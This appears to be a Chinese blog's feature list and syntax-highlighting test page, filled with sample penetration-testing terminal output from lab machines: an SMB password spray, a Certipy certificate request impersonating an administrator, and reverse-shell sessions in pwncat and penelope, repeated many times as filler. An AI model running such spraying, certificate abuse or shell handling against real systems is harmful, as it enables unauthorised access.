Blog 3.0
1. 新功能
- 显示笔记创建时间,最后一次更新时间
- 代码块行号显示
- 增加回到顶部功能
- 文件树增加文件数量显示
- 代码高亮
- 代码展开、折叠优化
- 文件下载功能
- 底部Copyright
- Vercel analytics支持
- 底部连接
- 文件下载
- 代码指定行背景高亮
- 反向链接显示
- 文档属性显示
- 脚注
- 各种细节
2. 代码高亮&行号显示&折叠/展开
2.1. 高亮
(123)
[123]
[-]
[!] [!] [-] [*] [+]
[123123] 123
qweqwe [1231]
SMB
LDAP
┌──(root㉿kali)-[~/Desktop/htb/Redelegate]
└─# nxc smb DC.redelegate.vl -u valid_user.txt -p passwords.txt --continue-on-success
SMB 10.129.130.206 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:redelegate.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.130.206 445 DC [-] REDELEGATE\DC$:Fall2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\FS01$:Fall2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Christine.Flanders:Fall2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [+] REDELEGATE\Marie.Curie:Fall2024!
SMB 10.129.130.206 445 DC [-] REDELEGATE\Helen.Frost:Fall2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Michael.Pontiac:Fall2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Mallory.Roberts:Fall2024! STATUS_ACCOUNT_RESTRICTION
SMB 10.129.130.206 445 DC [-] REDELEGATE\James.Dinkleberg:Fall2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Helpdesk:Fall2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\IT:Fall2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Finance:Fall2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\DnsAdmins:Fall2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\DnsUpdateProxy:Fall2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Ryan.Cooper:Fall2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\sql_svc:Fall2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\DC$:Winter2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\FS01$:Winter2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Christine.Flanders:Winter2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Helen.Frost:Winter2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Michael.Pontiac:Winter2024! STATUS_LOGON_FAILURE
SMB 10.129.130.206 445 DC [-] REDELEGATE\Mallory.Roberts:Winter2024! STATUS_ACCOUNT_RESTRICTION
SMB 10.129.130.206 445 DC [-] REDELEGATE\James.Dinkleberg:Winter2024! STATUS_LOGON_FAILURE
SMB dead:beef::b885:d62a:d679:573f 445 APT [-] sendai.vl\Elliot.Yates: STATUS_PASSWORD_MUST_CHANGE
2.2. 协议高亮
smb: \wwwdata\> ls
. D 0 Sat May 18 18:58:11 2019
.. D 0 Sat May 18 18:58:11 2019
default.aspx A 64 Sat May 18 18:58:06 2019
Recovery DHSn 0 Sat May 18 03:10:15 2019
pagefile.sys AHS 8014716928 Sat Aug 30 02:41:48 2025
ftp> command
ftp> ls
229 Entering Extended Passive Mode (|||38087|)
150 Here comes the directory listing.
drwxr-xr-x 3 0 0 4096 May 03 23:04 Desktop
lrwxrwxrwx 1 0 0 7 Nov 14 2024 bin -> usr/bin
drwxr-xr-x 3 0 0 4096 Jul 22 02:24 boot
drwxr-xr-x 18 0 0 3260 Aug 30 02:38 dev
drwxr-xr-x 258 0 0 12288 Aug 30 13:30 etc
drwxr-xr-x 3 0 0 4096 Nov 30 2024 home
lrwxrwxrwx 1 0 0 29 Mar 04 00:07 initrd.img -> boot/initrd.img-6.12.13-amd64
lrwxrwxrwx 1 0 0 28 Nov 30 2024 initrd.img.old -> boot/initrd.img-6.11.2-amd64
-rwxrw-rw- 1 0 0 5025777 May 12 2023 kali.png
smb: \> ls
$Recycle.Bin DHS 0 Mon Jul 13 22:34:39 2009
Documents and Settings DHSrn 0 Tue Jul 14 01:06:44 2009
ExchangeSetupLogs D 0 Sat May 18 19:39:40 2019
inetpub D 0 Sat May 18 18:47:41 2019
pagefile.sys AHS 8014716928 Sat Aug 30 02:41:48 2025
Program Files DR 0 Sun May 11 11:55:02 2025
Program Files (x86) DR 0 Sat May 25 22:35:29 2019
ProgramData DHn 0 Sun May 11 11:55:04 2025
Recovery DHSn 0 Sat May 18 03:10:15 2019
System Volume Information DHS 0 Sat May 24 10:22:53 2025
Users DR 0 Sat May 18 18:48:23 2019
Windows D 0 Sat Aug 30 13:24:14 2025
wwwdata D 0 Sat May 18 18:58:11 2019
15702527 blocks of size 4096. 10617728 blocks available
smb: \> cd wwwdata\
smb: \wwwdata\> ls
. D 0 Sat May 18 18:58:11 2019
.. D 0 Sat May 18 18:58:11 2019
default.aspx A 64 Sat May 18 18:58:06 2019
15702527 blocks of size 4096. 10617728 blocks available
2.3. bash高亮
支持多行命令
┌──(ro1ot㉿kali)-[~/Desktop/htb/Authority]
└─# certipy req \
-u 'c1trus$' -p 'Admin!' \
-dc-ip '10.10.11.222' -target 'authority.authority.htb' \
-ca 'AUTHORITY-CA' -template 'CorpVPN' \
-upn 'administrator@authority.htb' -sid 'S-1-5-21-622327497-3269355298-2248959698-500'
Certipy v5.0.3 - by Oliver Lyak (ly4k)
符号高亮
┌──(ro1ot㉿kali)-[~/Desktop/htb/Authority]
└─# ls /usr/bin -id 123 --hashes 123123:123123 '123123' "123123" | das > dasd < 1231> {das123} [123123] (123123) ? !
#普通用户
kali@kali:~/backup$ command
┌──(kali㉿kali)-[~/backup]
└─$ command
#root
┌──(root㉿kali)-[~/Desktop]
└─# command
root@kali:~/Desktop# command
root@iZ2vc2qm1sftm37y9ewushZ:~# command
┌──(kali㉿kali)-[/root]
└─$ command
┌──(root㉿kali)-[~/Desktop/htb/apt/backup]
└─# command
┌─[sg-vip-1]─[10.10.14.44]─[c1trus33@htb-bbskiercmm]─[~/apt]
└──╼ [★]#$ ls 10.10.11.11
11.11.11.11
marco@codetwo:~# $ sudo -l
bash-5.1$ command
bash-5.1# command
# command
tomcat@strutted:~/conf$ command
oxdf@hacky$ command
2.4. powershell
whoami
PS [kali]> whoami
PS [web01]> Get-Date
PS C:\> ls ftp
PS C:\driver> ls
PS C:\Users\keysvc>
2.5. pwncat & penelope
┌──(root㉿kali)-[~/Desktop/hmv/otte]
└─# pwncat-cs -lp 1234
[01:15:41] Welcome to pwncat 🐈! __main__.py:164
[01:17:04] received connection from 192.168.56.27:44386 bind.py:84
[01:17:04] 192.168.56.27:44386: registered new host w/ db manager.py:957
(local) pwncat$
(remote) www-data@otte:/var/www/html$ whoami
www-date
┌──(root㉿kali)-[~/Desktop/htb/season8/certificate]
└─# penelope 4321
[+] Listening for reverse shells on 0.0.0.0:4321 → 127.0.0.1 • 192.168.8.3 • 192.168.3.4 • 172.17.0.1 • 172.19.0.1 • 172.22.0.1 • 172.20.0.1 • 172.21.0.1 • 172.18.0.1 • 10.10.16.30
➤ 🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from DC01-10.10.11.71-Microsoft_Windows_Server_2019_Datacenter-x64-based_PC 😍️ Assigned SessionID <1>
[+] Added readline support...
[+] Interacting with session [1], Shell Type: Basic, Menu key: Ctrl-D
[+] Logging to /root/.penelope/DC01~10.10.11.71_Microsoft_Windows_Server_2019_Datacenter_x64-based_PC/2025_06_24-05_12_05-481.log 📜
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
PS C:\xampp\htdocs\certificate.htb\static\uploads\f74429cf2eca094d3d02e3c4f75bf684\she11> whoami
(Penelope)─(Session [4])> interact
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [4], Shell Type: PTY, Menu key: F12
[+] Logging to /root/.penelope/ubuntu~192.168.8.16-Linux-i686/2025_08_30-11_25_45-424.log 📜
─────────────────────────────────────────────────────────────────────────────────────────────
root@ubuntu:/home/yu#
┌──(root㉿kali)-[~]
└─# pwncat-cs -lp 4455
/root/.local/share/uv/tools/pwncat-cs/lib/python3.10/site-packages/zodburi/__init__.py:2: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
from pkg_resources import iter_entry_points
[11:26:28] Welcome to pwncat 🐈! __main__.py:164
[11:26:47] received connection from 192.168.8.16:54724 bind.py:84
[11:26:48] 192.168.8.16:54724: registered new host w/ db manager.py:957
(local) pwncat$
(remote) yu@ubuntu:/home/yu$ whoami
yu
(remote) yu@ubuntu:/home/yu$ ls
CVE-2021-3156 Documents exploit.c metarget Public
CVE-2021-4034-main Downloads lzs.sh Music Templates
Desktop examples.desktop main Pictures Videos
(remote) yu@ubuntu:/home/yu$
(local) pwncat$ upload /rev.sh
./rev.sh ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 223/223 bytes • ? • 0:00:00
[11:27:28] uploaded 223.00B in 0.29 seconds upload.py:76
(local) pwncat$ download ./.bash_history
./.bash_history ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 1.8/1.8 KB • ? • 0:00:00
[11:27:44] downloaded 1.85KiB in 0.05 seconds download.py:71
(local) pwncat$
(local) pwncat$ [-] Session [3] died... We lost kali~192.168.8.18-Linux-x86_64 💔
2.6. 长代码测试(越400行)
┌──(root㉿kali)-[~/Desktop/hmv/otte]
└─# pwncat-cs -lp 1234
[01:15:41] Welcome to pwncat 🐈! __main__.py:164
[01:17:04] received connection from 192.168.56.27:44386 bind.py:84
[01:17:04] 192.168.56.27:44386: registered new host w/ db manager.py:957
(local) pwncat$
(remote) www-data@otte:/var/www/html$ whoami
www-date
┌──(root㉿kali)-[~/Desktop/htb/season8/certificate]
└─# penelope 4321
[+] Listening for reverse shells on 0.0.0.0:4321 → 127.0.0.1 • 192.168.8.3 • 192.168.3.4 • 172.17.0.1 • 172.19.0.1 • 172.22.0.1 • 172.20.0.1 • 172.21.0.1 • 172.18.0.1 • 10.10.16.30
➤ 🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from DC01-10.10.11.71-Microsoft_Windows_Server_2019_Datacenter-x64-based_PC 😍️ Assigned SessionID <1>
[+] Added readline support...
[+] Interacting with session [1], Shell Type: Basic, Menu key: Ctrl-D
[+] Logging to /root/.penelope/DC01~10.10.11.71_Microsoft_Windows_Server_2019_Datacenter_x64-based_PC/2025_06_24-05_12_05-481.log 📜
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
PS C:\xampp\htdocs\certificate.htb\static\uploads\f74429cf2eca094d3d02e3c4f75bf684\she11> whoami
(Penelope)─(Session [4])> interact
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [4], Shell Type: PTY, Menu key: F12
[+] Logging to /root/.penelope/ubuntu~192.168.8.16-Linux-i686/2025_08_30-11_25_45-424.log 📜
─────────────────────────────────────────────────────────────────────────────────────────────
root@ubuntu:/home/yu#
┌──(root㉿kali)-[~]
└─# pwncat-cs -lp 4455
/root/.local/share/uv/tools/pwncat-cs/lib/python3.10/site-packages/zodburi/__init__.py:2: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
from pkg_resources import iter_entry_points
[11:26:28] Welcome to pwncat 🐈! __main__.py:164
[11:26:47] received connection from 192.168.8.16:54724 bind.py:84
[11:26:48] 192.168.8.16:54724: registered new host w/ db manager.py:957
(local) pwncat$
(remote) yu@ubuntu:/home/yu$ whoami
yu
(remote) yu@ubuntu:/home/yu$ ls
CVE-2021-3156 Documents exploit.c metarget Public
CVE-2021-4034-main Downloads lzs.sh Music Templates
Desktop examples.desktop main Pictures Videos
(remote) yu@ubuntu:/home/yu$
(local) pwncat$ upload /rev.sh
./rev.sh ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 223/223 bytes • ? • 0:00:00
[11:27:28] uploaded 223.00B in 0.29 seconds upload.py:76
(local) pwncat$ download ./.bash_history
./.bash_history ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 1.8/1.8 KB • ? • 0:00:00
[11:27:44] downloaded 1.85KiB in 0.05 seconds download.py:71
(local) pwncat$
(local) pwncat$ [-] Session [3] died... We lost kali~192.168.8.18-Linux-x86_64 💔
┌──(root㉿kali)-[~/Desktop/hmv/otte]
└─# pwncat-cs -lp 1234
[01:15:41] Welcome to pwncat 🐈! __main__.py:164
[01:17:04] received connection from 192.168.56.27:44386 bind.py:84
[01:17:04] 192.168.56.27:44386: registered new host w/ db manager.py:957
(local) pwncat$
(remote) www-data@otte:/var/www/html$ whoami
www-date
┌──(root㉿kali)-[~/Desktop/htb/season8/certificate]
└─# penelope 4321
[+] Listening for reverse shells on 0.0.0.0:4321 → 127.0.0.1 • 192.168.8.3 • 192.168.3.4 • 172.17.0.1 • 172.19.0.1 • 172.22.0.1 • 172.20.0.1 • 172.21.0.1 • 172.18.0.1 • 10.10.16.30
➤ 🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from DC01-10.10.11.71-Microsoft_Windows_Server_2019_Datacenter-x64-based_PC 😍️ Assigned SessionID <1>
[+] Added readline support...
[+] Interacting with session [1], Shell Type: Basic, Menu key: Ctrl-D
[+] Logging to /root/.penelope/DC01~10.10.11.71_Microsoft_Windows_Server_2019_Datacenter_x64-based_PC/2025_06_24-05_12_05-481.log 📜
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
PS C:\xampp\htdocs\certificate.htb\static\uploads\f74429cf2eca094d3d02e3c4f75bf684\she11> whoami
(Penelope)─(Session [4])> interact
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [4], Shell Type: PTY, Menu key: F12
[+] Logging to /root/.penelope/ubuntu~192.168.8.16-Linux-i686/2025_08_30-11_25_45-424.log 📜
─────────────────────────────────────────────────────────────────────────────────────────────
root@ubuntu:/home/yu#
┌──(root㉿kali)-[~]
└─# pwncat-cs -lp 4455
/root/.local/share/uv/tools/pwncat-cs/lib/python3.10/site-packages/zodburi/__init__.py:2: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
from pkg_resources import iter_entry_points
[11:26:28] Welcome to pwncat 🐈! __main__.py:164
[11:26:47] received connection from 192.168.8.16:54724 bind.py:84
[11:26:48] 192.168.8.16:54724: registered new host w/ db manager.py:957
(local) pwncat$
(remote) yu@ubuntu:/home/yu$ whoami
yu
(remote) yu@ubuntu:/home/yu$ ls
CVE-2021-3156 Documents exploit.c metarget Public
CVE-2021-4034-main Downloads lzs.sh Music Templates
Desktop examples.desktop main Pictures Videos
(remote) yu@ubuntu:/home/yu$
(local) pwncat$ upload /rev.sh
./rev.sh ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 223/223 bytes • ? • 0:00:00
[11:27:28] uploaded 223.00B in 0.29 seconds upload.py:76
(local) pwncat$ download ./.bash_history
./.bash_history ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 1.8/1.8 KB • ? • 0:00:00
[11:27:44] downloaded 1.85KiB in 0.05 seconds download.py:71
(local) pwncat$
(local) pwncat$ [-] Session [3] died... We lost kali~192.168.8.18-Linux-x86_64 💔
┌──(root㉿kali)-[~/Desktop/hmv/otte]
└─# pwncat-cs -lp 1234
[01:15:41] Welcome to pwncat 🐈! __main__.py:164
[01:17:04] received connection from 192.168.56.27:44386 bind.py:84
[01:17:04] 192.168.56.27:44386: registered new host w/ db manager.py:957
(local) pwncat$
(remote) www-data@otte:/var/www/html$ whoami
www-date
┌──(root㉿kali)-[~/Desktop/htb/season8/certificate]
└─# penelope 4321
[+] Listening for reverse shells on 0.0.0.0:4321 → 127.0.0.1 • 192.168.8.3 • 192.168.3.4 • 172.17.0.1 • 172.19.0.1 • 172.22.0.1 • 172.20.0.1 • 172.21.0.1 • 172.18.0.1 • 10.10.16.30
➤ 🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from DC01-10.10.11.71-Microsoft_Windows_Server_2019_Datacenter-x64-based_PC 😍️ Assigned SessionID <1>
[+] Added readline support...
[+] Interacting with session [1], Shell Type: Basic, Menu key: Ctrl-D
[+] Logging to /root/.penelope/DC01~10.10.11.71_Microsoft_Windows_Server_2019_Datacenter_x64-based_PC/2025_06_24-05_12_05-481.log 📜
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
PS C:\xampp\htdocs\certificate.htb\static\uploads\f74429cf2eca094d3d02e3c4f75bf684\she11> whoami
(Penelope)─(Session [4])> interact
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [4], Shell Type: PTY, Menu key: F12
[+] Logging to /root/.penelope/ubuntu~192.168.8.16-Linux-i686/2025_08_30-11_25_45-424.log 📜
─────────────────────────────────────────────────────────────────────────────────────────────
root@ubuntu:/home/yu#
┌──(root㉿kali)-[~]
└─# pwncat-cs -lp 4455
/root/.local/share/uv/tools/pwncat-cs/lib/python3.10/site-packages/zodburi/__init__.py:2: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
from pkg_resources import iter_entry_points
[11:26:28] Welcome to pwncat 🐈! __main__.py:164
[11:26:47] received connection from 192.168.8.16:54724 bind.py:84
[11:26:48] 192.168.8.16:54724: registered new host w/ db manager.py:957
(local) pwncat$
(remote) yu@ubuntu:/home/yu$ whoami
yu
(remote) yu@ubuntu:/home/yu$ ls
CVE-2021-3156 Documents exploit.c metarget Public
CVE-2021-4034-main Downloads lzs.sh Music Templates
Desktop examples.desktop main Pictures Videos
(remote) yu@ubuntu:/home/yu$
(local) pwncat$ upload /rev.sh
./rev.sh ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 223/223 bytes • ? • 0:00:00
[11:27:28] uploaded 223.00B in 0.29 seconds upload.py:76
(local) pwncat$ download ./.bash_history
./.bash_history ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 1.8/1.8 KB • ? • 0:00:00
[11:27:44] downloaded 1.85KiB in 0.05 seconds download.py:71
(local) pwncat$
(local) pwncat$ [-] Session [3] died... We lost kali~192.168.8.18-Linux-x86_64 💔
┌──(root㉿kali)-[~/Desktop/hmv/otte]
└─# pwncat-cs -lp 1234
[01:15:41] Welcome to pwncat 🐈! __main__.py:164
[01:17:04] received connection from 192.168.56.27:44386 bind.py:84
[01:17:04] 192.168.56.27:44386: registered new host w/ db manager.py:957
(local) pwncat$
(remote) www-data@otte:/var/www/html$ whoami
www-date
┌──(root㉿kali)-[~/Desktop/htb/season8/certificate]
└─# penelope 4321
[+] Listening for reverse shells on 0.0.0.0:4321 → 127.0.0.1 • 192.168.8.3 • 192.168.3.4 • 172.17.0.1 • 172.19.0.1 • 172.22.0.1 • 172.20.0.1 • 172.21.0.1 • 172.18.0.1 • 10.10.16.30
➤ 🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from DC01-10.10.11.71-Microsoft_Windows_Server_2019_Datacenter-x64-based_PC 😍️ Assigned SessionID <1>
[+] Added readline support...
[+] Interacting with session [1], Shell Type: Basic, Menu key: Ctrl-D
[+] Logging to /root/.penelope/DC01~10.10.11.71_Microsoft_Windows_Server_2019_Datacenter_x64-based_PC/2025_06_24-05_12_05-481.log 📜
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
PS C:\xampp\htdocs\certificate.htb\static\uploads\f74429cf2eca094d3d02e3c4f75bf684\she11> whoami
(Penelope)─(Session [4])> interact
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [4], Shell Type: PTY, Menu key: F12
[+] Logging to /root/.penelope/ubuntu~192.168.8.16-Linux-i686/2025_08_30-11_25_45-424.log 📜
─────────────────────────────────────────────────────────────────────────────────────────────
root@ubuntu:/home/yu#
┌──(root㉿kali)-[~]
└─# pwncat-cs -lp 4455
/root/.local/share/uv/tools/pwncat-cs/lib/python3.10/site-packages/zodburi/__init__.py:2: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
from pkg_resources import iter_entry_points
[11:26:28] Welcome to pwncat 🐈! __main__.py:164
[11:26:47] received connection from 192.168.8.16:54724 bind.py:84
[11:26:48] 192.168.8.16:54724: registered new host w/ db manager.py:957
(local) pwncat$
(remote) yu@ubuntu:/home/yu$ whoami
yu
(remote) yu@ubuntu:/home/yu$ ls
CVE-2021-3156 Documents exploit.c metarget Public
CVE-2021-4034-main Downloads lzs.sh Music Templates
Desktop examples.desktop main Pictures Videos
(remote) yu@ubuntu:/home/yu$
(local) pwncat$ upload /rev.sh
./rev.sh ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 223/223 bytes • ? • 0:00:00
[11:27:28] uploaded 223.00B in 0.29 seconds upload.py:76
(local) pwncat$ download ./.bash_history
./.bash_history ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 1.8/1.8 KB • ? • 0:00:00
[11:27:44] downloaded 1.85KiB in 0.05 seconds download.py:71
(local) pwncat$
(local) pwncat$ [-] Session [3] died... We lost kali~192.168.8.18-Linux-x86_64 💔
┌──(root㉿kali)-[~/Desktop/hmv/otte]
└─# pwncat-cs -lp 1234
[01:15:41] Welcome to pwncat 🐈! __main__.py:164
[01:17:04] received connection from 192.168.56.27:44386 bind.py:84
[01:17:04] 192.168.56.27:44386: registered new host w/ db manager.py:957
(local) pwncat$
(remote) www-data@otte:/var/www/html$ whoami
www-date
┌──(root㉿kali)-[~/Desktop/htb/season8/certificate]
└─# penelope 4321
[+] Listening for reverse shells on 0.0.0.0:4321 → 127.0.0.1 • 192.168.8.3 • 192.168.3.4 • 172.17.0.1 • 172.19.0.1 • 172.22.0.1 • 172.20.0.1 • 172.21.0.1 • 172.18.0.1 • 10.10.16.30
➤ 🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from DC01-10.10.11.71-Microsoft_Windows_Server_2019_Datacenter-x64-based_PC 😍️ Assigned SessionID <1>
[+] Added readline support...
[+] Interacting with session [1], Shell Type: Basic, Menu key: Ctrl-D
[+] Logging to /root/.penelope/DC01~10.10.11.71_Microsoft_Windows_Server_2019_Datacenter_x64-based_PC/2025_06_24-05_12_05-481.log 📜
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
PS C:\xampp\htdocs\certificate.htb\static\uploads\f74429cf2eca094d3d02e3c4f75bf684\she11> whoami
(Penelope)─(Session [4])> interact
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [4], Shell Type: PTY, Menu key: F12
[+] Logging to /root/.penelope/ubuntu~192.168.8.16-Linux-i686/2025_08_30-11_25_45-424.log 📜
─────────────────────────────────────────────────────────────────────────────────────────────
root@ubuntu:/home/yu#
┌──(root㉿kali)-[~]
└─# pwncat-cs -lp 4455
/root/.local/share/uv/tools/pwncat-cs/lib/python3.10/site-packages/zodburi/__init__.py:2: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
from pkg_resources import iter_entry_points
[11:26:28] Welcome to pwncat 🐈! __main__.py:164
[11:26:47] received connection from 192.168.8.16:54724 bind.py:84
[11:26:48] 192.168.8.16:54724: registered new host w/ db manager.py:957
(local) pwncat$
(remote) yu@ubuntu:/home/yu$ whoami
yu
(remote) yu@ubuntu:/home/yu$ ls
CVE-2021-3156 Documents exploit.c metarget Public
CVE-2021-4034-main Downloads lzs.sh Music Templates
Desktop examples.desktop main Pictures Videos
(remote) yu@ubuntu:/home/yu$
(local) pwncat$ upload /rev.sh
./rev.sh ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 223/223 bytes • ? • 0:00:00
[11:27:28] uploaded 223.00B in 0.29 seconds upload.py:76
(local) pwncat$ download ./.bash_history
./.bash_history ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 1.8/1.8 KB • ? • 0:00:00
[11:27:44] downloaded 1.85KiB in 0.05 seconds download.py:71
(local) pwncat$
(local) pwncat$ [-] Session [3] died... We lost kali~192.168.8.18-Linux-x86_64 💔
┌──(root㉿kali)-[~/Desktop/hmv/otte]
└─# pwncat-cs -lp 1234
[01:15:41] Welcome to pwncat 🐈! __main__.py:164
[01:17:04] received connection from 192.168.56.27:44386 bind.py:84
[01:17:04] 192.168.56.27:44386: registered new host w/ db manager.py:957
(local) pwncat$
(remote) www-data@otte:/var/www/html$ whoami
www-date
┌──(root㉿kali)-[~/Desktop/htb/season8/certificate]
└─# penelope 4321
[+] Listening for reverse shells on 0.0.0.0:4321 → 127.0.0.1 • 192.168.8.3 • 192.168.3.4 • 172.17.0.1 • 172.19.0.1 • 172.22.0.1 • 172.20.0.1 • 172.21.0.1 • 172.18.0.1 • 10.10.16.30
➤ 🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from DC01-10.10.11.71-Microsoft_Windows_Server_2019_Datacenter-x64-based_PC 😍️ Assigned SessionID <1>
[+] Added readline support...
[+] Interacting with session [1], Shell Type: Basic, Menu key: Ctrl-D
[+] Logging to /root/.penelope/DC01~10.10.11.71_Microsoft_Windows_Server_2019_Datacenter_x64-based_PC/2025_06_24-05_12_05-481.log 📜
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
PS C:\xampp\htdocs\certificate.htb\static\uploads\f74429cf2eca094d3d02e3c4f75bf684\she11> whoami
(Penelope)─(Session [4])> interact
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [4], Shell Type: PTY, Menu key: F12
[+] Logging to /root/.penelope/ubuntu~192.168.8.16-Linux-i686/2025_08_30-11_25_45-424.log 📜
─────────────────────────────────────────────────────────────────────────────────────────────
root@ubuntu:/home/yu#
┌──(root㉿kali)-[~]
└─# pwncat-cs -lp 4455
/root/.local/share/uv/tools/pwncat-cs/lib/python3.10/site-packages/zodburi/__init__.py:2: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
from pkg_resources import iter_entry_points
[11:26:28] Welcome to pwncat 🐈! __main__.py:164
[11:26:47] received connection from 192.168.8.16:54724 bind.py:84
[11:26:48] 192.168.8.16:54724: registered new host w/ db manager.py:957
(local) pwncat$
(remote) yu@ubuntu:/home/yu$ whoami
yu
(remote) yu@ubuntu:/home/yu$ ls
CVE-2021-3156 Documents exploit.c metarget Public
CVE-2021-4034-main Downloads lzs.sh Music Templates
Desktop examples.desktop main Pictures Videos
(remote) yu@ubuntu:/home/yu$
(local) pwncat$ upload /rev.sh
./rev.sh ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 223/223 bytes • ? • 0:00:00
[11:27:28] uploaded 223.00B in 0.29 seconds upload.py:76
(local) pwncat$ download ./.bash_history
./.bash_history ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 1.8/1.8 KB • ? • 0:00:00
[11:27:44] downloaded 1.85KiB in 0.05 seconds download.py:71
(local) pwncat$
(local) pwncat$ [-] Session [3] died... We lost kali~192.168.8.18-Linux-x86_64 💔
